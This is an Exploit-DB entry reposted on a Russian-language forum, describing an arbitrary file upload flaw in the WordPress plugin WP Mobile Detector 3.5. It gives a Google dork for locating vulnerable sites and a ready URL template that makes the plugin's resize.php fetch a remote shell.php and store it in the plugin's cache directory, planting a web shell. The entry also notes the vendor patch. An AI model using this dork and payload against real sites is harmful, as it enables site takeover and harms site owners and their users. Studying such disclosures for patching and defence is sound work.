Exploit WordPress Plugin WP Mobile Detector 3.5 - Arbitrary File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39891
Проверка EDB
  1. Пройдено
Автор
AADITYA PURANI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2016-06-06
WordPress Plugin WP Mobile Detector 3.5 - Arbitrary File Upload
Код:
#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload
#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector
#Date: 1-06-2015
#Exploit Author: Aaditya Purani
#Author Details: https://aadityapurani.com
#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog
#Version: 3.5
#Tested on: Kali Linux 2.0 Sana / Windows 10


This Vulnerable has been disclosed to public yesterday about WP Mobile
Detector Arbitrary File upload for version <=3.5 in which attacker can
upload malicious PHP Files (Shell) into the Website. Over 10,000 users are
affected, Vendor has released a Patch in their version 3.6 & 3.7 at
https://wordpress.org/plugins/wp-mobile-detector/changelog/ .

I have wrote a Complete POC post:

https://aadityapurani.com/2016/06/03/mobile-detector-poc/

I have made a POC Video Here:
https://www.youtube.com/watch?v=ULE1AVWfHTU

Simple POC:

Go to: 

[wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]

and it will get saved in directory:

/wp-content/plugins/wp-mobile-detector/cache/shell.php
 
Источник
www.exploit-db.com

Похожие темы